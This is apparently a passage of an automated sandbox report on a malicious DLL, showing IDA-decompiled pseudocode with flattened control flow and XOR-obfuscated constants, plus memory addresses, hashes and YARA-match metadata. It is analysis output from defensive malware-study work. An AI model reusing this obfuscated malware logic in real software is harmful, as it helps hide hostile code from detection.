                                                                                                                                                                            				_v24 = _v24 * 0x55;
                                                                                                                                                                            				_v24 = _v24 ^ 0x80aa83de;
                                                                                                                                                                            				_v28 = 0x9b3a5a;
                                                                                                                                                                            				_v28 = _v28 + 0x3060;
                                                                                                                                                                            				_v28 = _v28 + 0xffffd119;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00918c22;
                                                                                                                                                                            				_v32 = 0x1265dc;
                                                                                                                                                                            				_v32 = _v32 >> 0xd;
                                                                                                                                                                            				_v32 = _v32 | 0x6a7496c5;
                                                                                                                                                                            				_v32 = _v32 << 0xe;
                                                                                                                                                                            				_v32 = _v32 ^ 0x25b994ca;
                                                                                                                                                                            				_v36 = 0xc9b3ee;
                                                                                                                                                                            				_v36 = _v36 >> 5;
                                                                                                                                                                            				_v36 = _v36 + 0x1e11;
                                                                                                                                                                            				_v36 = _v36 << 3;
                                                                                                                                                                            				_v36 = _v36 ^ 0x0035933c;
                                                                                                                                                                            				_v8 = 0x402308;
                                                                                                                                                                            				_v8 = _v8 ^ 0x846a3c70;
                                                                                                                                                                            				_v8 = _v8 << 3;
                                                                                                                                                                            				_v8 = _v8 ^ 0x2152b8ae;
                                                                                                                                                                            				_v12 = 0xd9cdb9;
                                                                                                                                                                            				_v12 = _v12 * 0x16;
                                                                                                                                                                            				_v12 = _v12 | 0x05b8ac83;
                                                                                                                                                                            				_v12 = _v12 ^ 0x17b93340;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t117 != 0xb1e0fe5) {
                                                                                                                                                                            						if(_t117 == 0xb7b3e2e) {
                                                                                                                                                                            							_t116 = _t116 + E02F6BE8C(_t108 + 0x18, _v32, _v36, _v8, _v12);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t117 == 0xcf04418) {
                                                                                                                                                                            								_t104 = E02F6BE8C(_t108, _v20, _v40, _v24, _v28);
                                                                                                                                                                            								_t119 =  &(_t119[3]);
                                                                                                                                                                            								_t117 = 0xb7b3e2e;
                                                                                                                                                                            								_t116 = _t116 + _t104;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t117 != 0xe755a9f) {
                                                                                                                                                                            									goto L8;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t117 = 0xb1e0fe5;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L11:
                                                                                                                                                                            						return _t116;
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(_t108);
                                                                                                                                                                            					_t101 = E02F607F0();
                                                                                                                                                                            					_t119 =  &(_t119[1]);
                                                                                                                                                                            					_t117 = 0xcf04418;
                                                                                                                                                                            					_t116 = _t116 + _t101;
                                                                                                                                                                            					L8:
                                                                                                                                                                            				} while (_t117 != 0x795fd89);
                                                                                                                                                                            				goto L11;
                                                                                                                                                                            			}





















                                                                                                                                                                            0x02f65333
                                                                                                                                                                            0x02f65333
                                                                                                                                                                            0x02f65336
                                                                                                                                                                            0x02f65340
                                                                                                                                                                            0x02f65348
                                                                                                                                                                            0x02f6534d
                                                                                                                                                                            0x02f65355
                                                                                                                                                                            0x02f6535d
                                                                                                                                                                            0x02f65365
                                                                                                                                                                            0x02f6536d
                                                                                                                                                                            0x02f6537f
                                                                                                                                                                            0x02f65384
                                                                                                                                                                            0x02f6538a
                                                                                                                                                                            0x02f6538f
                                                                                                                                                                            0x02f65391
                                                                                                                                                                            0x02f65399
                                                                                                                                                                            0x02f6539e
                                                                                                                                                                            0x02f653af
                                                                                                                                                                            0x02f653b7
                                                                                                                                                                            0x02f653bb
                                                                                                                                                                            0x02f653bf
                                                                                                                                                                            0x02f653c7
                                                                                                                                                                            0x02f653cf
                                                                                                                                                                            0x02f653d7
                                                                                                                                                                            0x02f653e4
                                                                                                                                                                            0x02f653e8
                                                                                                                                                                            0x02f653f0
                                                                                                                                                                            0x02f653f8
                                                                                                                                                                            0x02f65400
                                                                                                                                                                            0x02f65408
                                                                                                                                                                            0x02f65410
                                                                                                                                                                            0x02f65418
                                                                                                                                                                            0x02f6541d
                                                                                                                                                                            0x02f65425
                                                                                                                                                                            0x02f6542a
                                                                                                                                                                            0x02f65432
                                                                                                                                                                            0x02f6543a
                                                                                                                                                                            0x02f6543f
                                                                                                                                                                            0x02f65447
                                                                                                                                                                            0x02f6544c
                                                                                                                                                                            0x02f65454
                                                                                                                                                                            0x02f6545c
                                                                                                                                                                            0x02f65464
                                                                                                                                                                            0x02f65469
                                                                                                                                                                            0x02f65471
                                                                                                                                                                            0x02f6547e
                                                                                                                                                                            0x02f65482
                                                                                                                                                                            0x02f6548a
                                                                                                                                                                            0x02f65492
                                                                                                                                                                            0x02f65492
                                                                                                                                                                            0x02f65498
                                                                                                                                                                            0x02f65509
                                                                                                                                                                            0x02f6549a
                                                                                                                                                                            0x02f654a0
                                                                                                                                                                            0x02f654be
                                                                                                                                                                            0x02f654c3
                                                                                                                                                                            0x02f654c6
                                                                                                                                                                            0x02f654c8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f654a2
                                                                                                                                                                            0x02f654a8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f654aa
                                                                                                                                                                            0x02f654aa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f654aa
                                                                                                                                                                            0x02f654a8
                                                                                                                                                                            0x02f654a0
                                                                                                                                                                            0x02f6550b
                                                                                                                                                                            0x02f65514
                                                                                                                                                                            0x02f65514
                                                                                                                                                                            0x02f654d4
                                                                                                                                                                            0x02f654d5
                                                                                                                                                                            0x02f654da
                                                                                                                                                                            0x02f654dd
                                                                                                                                                                            0x02f654e2
                                                                                                                                                                            0x02f654e4
                                                                                                                                                                            0x02f654e4
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `0$j0
                                                                                                                                                                            • API String ID: 0-1706687062
                                                                                                                                                                            • Opcode ID: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
                                                                                                                                                                            • Instruction ID: a3c0a77438c0f711d4f7055e0b56c9b67fb1f5e371bd8833f951c0151c0bf526
                                                                                                                                                                            • Opcode Fuzzy Hash: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
                                                                                                                                                                            • Instruction Fuzzy Hash: 1C4156729083019FC344DF21998941BFBE1FBD8798F504A2DF999A6260C3718A59CF97
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                            			E02F57E79(intOrPtr* __ecx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				char _v304;
                                                                                                                                                                            				char _t99;
                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                            				void* _t105;
                                                                                                                                                                            				signed int _t107;
                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                            				char* _t109;
                                                                                                                                                                            				intOrPtr* _t124;
                                                                                                                                                                            				void* _t125;
                                                                                                                                                                            
                                                                                                                                                                            				_t124 = __ecx;
                                                                                                                                                                            				_v16 = 0xb54463;
                                                                                                                                                                            				_v16 = _v16 + 0xffff3415;
                                                                                                                                                                            				_v16 = _v16 >> 0xc;
                                                                                                                                                                            				_v16 = _v16 + 0xffffe11b;
                                                                                                                                                                            				_v16 = _v16 ^ 0xfff7a701;
                                                                                                                                                                            				_v28 = 0xd77279;
                                                                                                                                                                            				_v28 = _v28 | 0x400730c3;
                                                                                                                                                                            				_v28 = _v28 << 0xb;
                                                                                                                                                                            				_v28 = _v28 ^ 0xbb990da4;
                                                                                                                                                                            				_v36 = 0xbcfff8;
                                                                                                                                                                            				_v36 = _v36 >> 6;
                                                                                                                                                                            				_v36 = _v36 ^ 0x000a6762;
                                                                                                                                                                            				_v8 = 0xf31a9;
                                                                                                                                                                            				_v8 = _v8 + 0xffff1e98;
                                                                                                                                                                            				_v8 = _v8 ^ 0xb4a41066;
                                                                                                                                                                            				_v8 = _v8 | 0xf0d45968;
                                                                                                                                                                            				_v8 = _v8 ^ 0xf4f540ba;
                                                                                                                                                                            				_v12 = 0xc524e1;
                                                                                                                                                                            				_v12 = _v12 >> 0xe;
                                                                                                                                                                            				_v12 = _v12 >> 5;
                                                                                                                                                                            				_t107 = 0x45;
                                                                                                                                                                            				_v12 = _v12 / _t107;
                                                                                                                                                                            				_v12 = _v12 ^ 0x00048931;
                                                                                                                                                                            				_v44 = 0x28a4d;
                                                                                                                                                                            				_v44 = _v44 + 0x8441;
                                                                                                                                                                            				_v44 = _v44 ^ 0x00037729;
                                                                                                                                                                            				_v20 = 0x237a7e;
                                                                                                                                                                            				_v20 = _v20 ^ 0x3c41f8ff;
                                                                                                                                                                            				_v20 = _v20 | 0x4ede09cf;
                                                                                                                                                                            				_v20 = _v20 >> 6;
                                                                                                                                                                            				_v20 = _v20 ^ 0x01f9a400;
                                                                                                                                                                            				_v32 = 0xc1354c;
                                                                                                                                                                            				_v32 = _v32 ^ 0xd017d736;
                                                                                                                                                                            				_v32 = _v32 + 0xb685;
                                                                                                                                                                            				_v32 = _v32 ^ 0xd0d9caff;
                                                                                                                                                                            				_v24 = 0x1c6e66;
                                                                                                                                                                            				_v24 = _v24 + 0xffff7553;
                                                                                                                                                                            				_t108 = 0x67;
                                                                                                                                                                            				_t109 =  &_v304;
                                                                                                                                                                            				_v24 = _v24 / _t108;
                                                                                                                                                                            				_v24 = _v24 ^ 0x000aa416;
                                                                                                                                                                            				_v40 = 0xe04b7f;
                                                                                                                                                                            				_v40 = _v40 ^ 0x3f01302b;
                                                                                                                                                                            				_v40 = _v40 ^ 0x3feda652;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t99 =  *_t124;
                                                                                                                                                                            					if(_t99 == 0) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t99 == 0x2e) {
                                                                                                                                                                            						 *_t109 = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *_t109 = _t99;
                                                                                                                                                                            						_t109 = _t109 + 1;
                                                                                                                                                                            						_t124 = _t124 + 1;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_t125 = E02F5801A(_v16,  &_v304, _v28);
                                                                                                                                                                            					if(_t125 != 0) {
                                                                                                                                                                            						L8:
                                                                                                                                                                            						_t101 = E02F53362(_t124 + 1, _v12, _v44);
                                                                                                                                                                            						_push(_v40);
                                                                                                                                                                            						_push(_v24);
                                                                                                                                                                            						_push(_t101 ^ 0x31e3fec1);
                                                                                                                                                                            						_push(_t125);
                                                                                                                                                                            						return E02F5EC31(_v20, _v32);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t105 = E02F5483C(_v36, _v8,  &_v304);
                                                                                                                                                                            					_t125 = _t105;
                                                                                                                                                                            					if(_t125 != 0) {
                                                                                                                                                                            						goto L8;
                                                                                                                                                                            					}
                                                                                                                                                                            					return _t105;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L6;
                                                                                                                                                                            			}






















                                                                                                                                                                            0x02f57e84
                                                                                                                                                                            0x02f57e86
                                                                                                                                                                            0x02f57e8f
                                                                                                                                                                            0x02f57e96
                                                                                                                                                                            0x02f57e9a
                                                                                                                                                                            0x02f57ea1
                                                                                                                                                                            0x02f57ea8
                                                                                                                                                                            0x02f57eaf
                                                                                                                                                                            0x02f57eb6
                                                                                                                                                                            0x02f57eba
                                                                                                                                                                            0x02f57ec1
                                                                                                                                                                            0x02f57ec8
                                                                                                                                                                            0x02f57ecc
                                                                                                                                                                            0x02f57ed3
                                                                                                                                                                            0x02f57eda
                                                                                                                                                                            0x02f57ee1
                                                                                                                                                                            0x02f57ee8
                                                                                                                                                                            0x02f57eef
                                                                                                                                                                            0x02f57ef6
                                                                                                                                                                            0x02f57efd
                                                                                                                                                                            0x02f57f01
                                                                                                                                                                            0x02f57f0a
                                                                                                                                                                            0x02f57f0f
                                                                                                                                                                            0x02f57f14
                                                                                                                                                                            0x02f57f1b
                                                                                                                                                                            0x02f57f22
                                                                                                                                                                            0x02f57f29
                                                                                                                                                                            0x02f57f30
                                                                                                                                                                            0x02f57f37
                                                                                                                                                                            0x02f57f3e
                                                                                                                                                                            0x02f57f45
                                                                                                                                                                            0x02f57f49
                                                                                                                                                                            0x02f57f50
                                                                                                                                                                            0x02f57f57
                                                                                                                                                                            0x02f57f5e
                                                                                                                                                                            0x02f57f65
                                                                                                                                                                            0x02f57f6c
                                                                                                                                                                            0x02f57f73
                                                                                                                                                                            0x02f57f7d
                                                                                                                                                                            0x02f57f80
                                                                                                                                                                            0x02f57f86
                                                                                                                                                                            0x02f57f89
                                                                                                                                                                            0x02f57f90
                                                                                                                                                                            0x02f57f97
                                                                                                                                                                            0x02f57f9e
                                                                                                                                                                            0x02f57faf
                                                                                                                                                                            0x02f57faf
                                                                                                                                                                            0x02f57fb3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57fa9
                                                                                                                                                                            0x02f57fb7
                                                                                                                                                                            0x02f57fab
                                                                                                                                                                            0x02f57fab
                                                                                                                                                                            0x02f57fad
                                                                                                                                                                            0x02f57fae
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57fae
                                                                                                                                                                            0x02f57fba
                                                                                                                                                                            0x02f57fcb
                                                                                                                                                                            0x02f57fd0
                                                                                                                                                                            0x02f57feb
                                                                                                                                                                            0x02f57ff4
                                                                                                                                                                            0x02f57ff9
                                                                                                                                                                            0x02f58001
                                                                                                                                                                            0x02f5800a
                                                                                                                                                                            0x02f5800b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f58011
                                                                                                                                                                            0x02f57fdf
                                                                                                                                                                            0x02f57fe4
                                                                                                                                                                            0x02f57fe9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f58019
                                                                                                                                                                            0x02f58019
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: bg$~z#
                                                                                                                                                                            • API String ID: 0-3633068236
                                                                                                                                                                            • Opcode ID: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
                                                                                                                                                                            • Instruction ID: 25c0a3b44af4a609b5f30a39c3fbec6c8428503975dfa9820c3dedf61f3a12bf
                                                                                                                                                                            • Opcode Fuzzy Hash: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
                                                                                                                                                                            • Instruction Fuzzy Hash: FA413772C0032EDBDF55DEA4C8495EEFBB1AF55718F208199CA51B6220C7B40B46CFA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: bWr$(8r
                                                                                                                                                                            • API String ID: 0-4034592896
                                                                                                                                                                            • Opcode ID: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
                                                                                                                                                                            • Instruction ID: 8af8b96c325e77a0bb1d8c3ae7bb33112424606ab5857117d3c4efebaad1d468
                                                                                                                                                                            • Opcode Fuzzy Hash: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
                                                                                                                                                                            • Instruction Fuzzy Hash: DE411471C00219EFCF58CFA4D94A9EEBBB5FB04304F20829AD511B6260D7B55B85CF95
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E02F6F840(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                            				char _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				void* _t197;
                                                                                                                                                                            				void* _t220;
                                                                                                                                                                            				intOrPtr* _t230;
                                                                                                                                                                            				void* _t232;
                                                                                                                                                                            				void* _t252;
                                                                                                                                                                            				void* _t253;
                                                                                                                                                                            				signed int _t254;
                                                                                                                                                                            				signed int _t255;
                                                                                                                                                                            				signed int _t256;
                                                                                                                                                                            				signed int _t257;
                                                                                                                                                                            				signed int _t258;
                                                                                                                                                                            				signed int _t259;
                                                                                                                                                                            				signed int _t260;
                                                                                                                                                                            				signed int _t261;
                                                                                                                                                                            				signed int* _t264;
                                                                                                                                                                            
                                                                                                                                                                            				_t230 = _a4;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_t252 = __ecx;
                                                                                                                                                                            				_push(_t230);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t197);
                                                                                                                                                                            				_v16 = 0x43fd88;
                                                                                                                                                                            				_t264 =  &(( &_v84)[4]);
                                                                                                                                                                            				_v16 = _v16 << 4;
                                                                                                                                                                            				_v16 = _v16 ^ 0x043fd881;
                                                                                                                                                                            				_t253 = 0;
                                                                                                                                                                            				_v36 = 0xa6c090;
                                                                                                                                                                            				_t232 = 0x483ab52;
                                                                                                                                                                            				_v36 = _v36 >> 0xd;
                                                                                                                                                                            				_v36 = _v36 + 0x55d4;
                                                                                                                                                                            				_v36 = _v36 ^ 0x00005b0b;
                                                                                                                                                                            				_v48 = 0x2dc4d8;
                                                                                                                                                                            				_t254 = 0xf;
                                                                                                                                                                            				_v48 = _v48 / _t254;
                                                                                                                                                                            				_v48 = _v48 + 0x1bd9;
                                                                                                                                                                            				_v48 = _v48 ^ 0x0001e475;
                                                                                                                                                                            				_v80 = 0x1961e0;
                                                                                                                                                                            				_v80 = _v80 | 0x2e5a3b97;
                                                                                                                                                                            				_v80 = _v80 >> 0x10;
                                                                                                                                                                            				_v80 = _v80 >> 4;
                                                                                                                                                                            				_v80 = _v80 ^ 0x00050c56;
                                                                                                                                                                            				_v52 = 0x801119;
                                                                                                                                                                            				_t255 = 0x4c;
                                                                                                                                                                            				_v52 = _v52 * 0x3b;
                                                                                                                                                                            				_v52 = _v52 / _t255;
                                                                                                                                                                            				_v52 = _v52 ^ 0x006b0701;
                                                                                                                                                                            				_v12 = 0x5b3baf;
                                                                                                                                                                            				_v12 = _v12 + 0xffffe0d8;
                                                                                                                                                                            				_v12 = _v12 ^ 0x0050d6d6;
                                                                                                                                                                            				_v20 = 0xddf3bb;
                                                                                                                                                                            				_v20 = _v20 + 0x1688;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00da105f;
                                                                                                                                                                            				_v84 = 0xb842b2;
                                                                                                                                                                            				_v84 = _v84 >> 3;
                                                                                                                                                                            				_t256 = 0x6e;
                                                                                                                                                                            				_v84 = _v84 * 0x79;
                                                                                                                                                                            				_v84 = _v84 << 3;
                                                                                                                                                                            				_v84 = _v84 ^ 0x571ab13d;
                                                                                                                                                                            				_v56 = 0xc043e1;
                                                                                                                                                                            				_v56 = _v56 >> 6;
                                                                                                                                                                            				_v56 = _v56 ^ 0x181f9cd5;
                                                                                                                                                                            				_v56 = _v56 ^ 0x181bbe52;
                                                                                                                                                                            				_v24 = 0xd2b7cf;
                                                                                                                                                                            				_v24 = _v24 / _t256;
                                                                                                                                                                            				_v24 = _v24 ^ 0x00057f60;
                                                                                                                                                                            				_v60 = 0x8a3800;
                                                                                                                                                                            				_v60 = _v60 >> 6;
                                                                                                                                                                            				_v60 = _v60 | 0x8f8b2365;
                                                                                                                                                                            				_v60 = _v60 ^ 0x8f8e0970;
                                                                                                                                                                            				_v64 = 0xc9e96d;
                                                                                                                                                                            				_v64 = _v64 << 0x10;
                                                                                                                                                                            				_v64 = _v64 << 5;
                                                                                                                                                                            				_v64 = _v64 ^ 0x2da69c1f;
                                                                                                                                                                            				_v68 = 0x328e52;
                                                                                                                                                                            				_v68 = _v68 * 0x66;
                                                                                                                                                                            				_v68 = _v68 << 3;
                                                                                                                                                                            				_v68 = _v68 ^ 0xa1266097;
                                                                                                                                                                            				_v28 = 0xf9277c;
                                                                                                                                                                            				_v28 = _v28 << 0xa;
                                                                                                                                                                            				_v28 = _v28 << 3;
                                                                                                                                                                            				_v28 = _v28 ^ 0x24e98be4;
                                                                                                                                                                            				_v72 = 0xc9ae08;
                                                                                                                                                                            				_v72 = _v72 | 0xbe9fb7a8;
                                                                                                                                                                            				_v72 = _v72 << 1;
                                                                                                                                                                            				_v72 = _v72 + 0xffff17b5;
                                                                                                                                                                            				_v72 = _v72 ^ 0x7db3cb0d;
                                                                                                                                                                            				_v32 = 0x7a6981;
                                                                                                                                                                            				_v32 = _v32 ^ 0xd4fdb142;
                                                                                                                                                                            				_t257 = 0x69;
                                                                                                                                                                            				_v32 = _v32 / _t257;
                                                                                                                                                                            				_v32 = _v32 ^ 0x020955a0;
                                                                                                                                                                            				_v76 = 0x732b21;
                                                                                                                                                                            				_t258 = 0x5e;
                                                                                                                                                                            				_v76 = _v76 / _t258;
                                                                                                                                                                            				_t259 = 0xb;
                                                                                                                                                                            				_v76 = _v76 / _t259;
                                                                                                                                                                            				_v76 = _v76 + 0xb8c3;
                                                                                                                                                                            				_v76 = _v76 ^ 0x0005bc70;
                                                                                                                                                                            				_v8 = 0x8f6a69;
                                                                                                                                                                            				_t260 = 0x5d;
                                                                                                                                                                            				_v8 = _v8 / _t260;
                                                                                                                                                                            				_v8 = _v8 ^ 0x000b5b39;
                                                                                                                                                                            				_v40 = 0x75e3f0;
                                                                                                                                                                            				_t261 = 0x55;
                                                                                                                                                                            				_v40 = _v40 / _t261;
                                                                                                                                                                            				_v40 = _v40 + 0xffff98ec;
                                                                                                                                                                            				_v40 = _v40 ^ 0x0009f0a2;
                                                                                                                                                                            				_v44 = 0x50946;
                                                                                                                                                                            				_v44 = _v44 * 0x76;
                                                                                                                                                                            				_v44 = _v44 + 0xffff2591;
                                                                                                                                                                            				_v44 = _v44 ^ 0x0253dc14;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t232 != 0x483ab52) {
                                                                                                                                                                            						if(_t232 == 0x71a4461) {
                                                                                                                                                                            							_t220 = E02F6A1C0(_v48, _t232, _v80, _v52, _v12,  &_v4, _v16, _v20, _v84, 0, _t232, _v56, _t252);
                                                                                                                                                                            							_t264 =  &(_t264[0xc]);
                                                                                                                                                                            							if(_t220 != 0) {
                                                                                                                                                                            								_t232 = 0xc565723;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t232 == 0xc565723) {
                                                                                                                                                                            								_push(_t232);
                                                                                                                                                                            								_push(_t232);
                                                                                                                                                                            								_t253 = E02F5C5D8(_v4);
                                                                                                                                                                            								_t264 =  &(_t264[3]);
                                                                                                                                                                            								if(_t253 != 0) {
                                                                                                                                                                            									_t232 = 0xf0f9d9d;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t232 != 0xf0f9d9d) {
                                                                                                                                                                            									goto L12;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									E02F6A1C0(_v28, _t232, _v72, _v32, _v76,  &_v4, _v36, _v8, _v40, _t253, _t232, _v44, _t252);
                                                                                                                                                                            									 *_t230 = _v4;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L6:
                                                                                                                                                                            						return _t253;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t232 = 0x71a4461;
                                                                                                                                                                            					L12:
                                                                                                                                                                            				} while (_t232 != 0xd0fff7e);
                                                                                                                                                                            				goto L6;
                                                                                                                                                                            			}







































                                                                                                                                                                            0x02f6f844
                                                                                                                                                                            0x02f6f84b
                                                                                                                                                                            0x02f6f84f
                                                                                                                                                                            0x02f6f851
                                                                                                                                                                            0x02f6f853
                                                                                                                                                                            0x02f6f854
                                                                                                                                                                            0x02f6f859
                                                                                                                                                                            0x02f6f861
                                                                                                                                                                            0x02f6f864
                                                                                                                                                                            0x02f6f86b
                                                                                                                                                                            0x02f6f873
                                                                                                                                                                            0x02f6f875
                                                                                                                                                                            0x02f6f87d
                                                                                                                                                                            0x02f6f882
                                                                                                                                                                            0x02f6f887
                                                                                                                                                                            0x02f6f88f
                                                                                                                                                                            0x02f6f897
                                                                                                                                                                            0x02f6f8a5
                                                                                                                                                                            0x02f6f8aa
                                                                                                                                                                            0x02f6f8b0
                                                                                                                                                                            0x02f6f8b8
                                                                                                                                                                            0x02f6f8c0
                                                                                                                                                                            0x02f6f8c8
                                                                                                                                                                            0x02f6f8d0
                                                                                                                                                                            0x02f6f8d5
                                                                                                                                                                            0x02f6f8da
                                                                                                                                                                            0x02f6f8e2
                                                                                                                                                                            0x02f6f8ef
                                                                                                                                                                            0x02f6f8f2
                                                                                                                                                                            0x02f6f8fe
                                                                                                                                                                            0x02f6f902
                                                                                                                                                                            0x02f6f90a
                                                                                                                                                                            0x02f6f912
                                                                                                                                                                            0x02f6f91a
                                                                                                                                                                            0x02f6f922
                                                                                                                                                                            0x02f6f92a
                                                                                                                                                                            0x02f6f932
                                                                                                                                                                            0x02f6f93a
                                                                                                                                                                            0x02f6f942
                                                                                                                                                                            0x02f6f94c
                                                                                                                                                                            0x02f6f94d
                                                                                                                                                                            0x02f6f951
                                                                                                                                                                            0x02f6f956
                                                                                                                                                                            0x02f6f95e
                                                                                                                                                                            0x02f6f966
                                                                                                                                                                            0x02f6f96b
                                                                                                                                                                            0x02f6f973
                                                                                                                                                                            0x02f6f97b
                                                                                                                                                                            0x02f6f989
                                                                                                                                                                            0x02f6f98d
                                                                                                                                                                            0x02f6f995
                                                                                                                                                                            0x02f6f99d
                                                                                                                                                                            0x02f6f9a2
                                                                                                                                                                            0x02f6f9aa
                                                                                                                                                                            0x02f6f9b2
                                                                                                                                                                            0x02f6f9ba
                                                                                                                                                                            0x02f6f9bf
                                                                                                                                                                            0x02f6f9c4
                                                                                                                                                                            0x02f6f9cc
                                                                                                                                                                            0x02f6f9d9
                                                                                                                                                                            0x02f6f9dd
                                                                                                                                                                            0x02f6f9e2
                                                                                                                                                                            0x02f6f9ec
                                                                                                                                                                            0x02f6f9f4
                                                                                                                                                                            0x02f6f9f9
                                                                                                                                                                            0x02f6f9fe
                                                                                                                                                                            0x02f6fa06
                                                                                                                                                                            0x02f6fa0e
                                                                                                                                                                            0x02f6fa16
                                                                                                                                                                            0x02f6fa1a
                                                                                                                                                                            0x02f6fa22
                                                                                                                                                                            0x02f6fa2a
                                                                                                                                                                            0x02f6fa32
                                                                                                                                                                            0x02f6fa40
                                                                                                                                                                            0x02f6fa45
                                                                                                                                                                            0x02f6fa4b
                                                                                                                                                                            0x02f6fa53
                                                                                                                                                                            0x02f6fa5f
                                                                                                                                                                            0x02f6fa64
                                                                                                                                                                            0x02f6fa6e
